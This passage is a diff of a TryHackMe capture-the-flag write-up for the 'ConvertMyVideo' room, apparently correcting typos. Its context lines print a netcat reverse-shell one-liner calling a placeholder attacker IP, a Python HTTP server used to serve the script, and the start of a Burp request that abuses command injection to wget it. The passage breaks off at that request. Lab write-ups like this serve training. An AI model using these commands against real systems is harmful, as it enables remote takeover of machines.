tsumarios/CTF-Writeups/THM/ConvertMyVideo/README.md

 rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <attacker_IP> 4444 >/tmp/f
 ```

-Now we have to upload the fileto the remote machine.
-In order to do such thing, we can simply run a Python server and downloa the file from the remote machine, exploiting the command injection:
+Now we have to upload the file to the remote machine.
+In order to do such thing, we can simply run a Python server and download the file from the remote machine:

 ```sh
 attacker@machine:~$ python3 -m http.server 4343
 ```

-And then, just posting the following HTTP request with Burp Repeater, which will "wget" our `rev_shell.sh` script:
+And then we can exploit the command injection by just posting the following HTTP request with Burp Repeater, which will "wget" our `rev_shell.sh` script:

 ```
 POST / HTTP/1.1